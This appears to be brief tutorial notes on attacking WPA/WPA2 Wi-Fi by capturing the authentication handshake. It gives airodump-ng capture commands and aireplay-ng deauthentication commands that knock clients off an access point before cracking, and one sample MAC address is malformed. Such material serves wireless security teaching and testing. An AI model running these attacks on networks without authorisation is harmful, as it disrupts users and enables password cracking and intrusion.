Handshake Capture

Intro & Concept

• One way to attack Wi-Fi networks (WPA/WPA2) is by capturing a handshake from an authentication or just passively waiting for it.

• Now in order to capture this you will need to have the AP ESSID or the BSSID, and the channel that is listening to your AP to start capturing/listening packets around that specific router.

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

• Now you have two options, wait for your client to connect the AP you are trying to break in, or make some active attack, I always prefer the second option. You need to make a de-authentication attack to "deauthenticate" a client or just make a de-auth of all clients.

aireplay-ng -0 0 -e 'AP_name' -c 'FF:FF:FF:FF:FF:FF' wlan0mon #Send de-auth packets to broadcast address, de-auth all-clients
aireplay-ng -0 0 -e 'AP_name' -c '8d:02:03:2d:cf:ws' wlan0mom #De-auth specific client's

• Once on the airodump-ng screen appears above to the right, WPA Handshake, you can stop sniffing and start with the cracking process.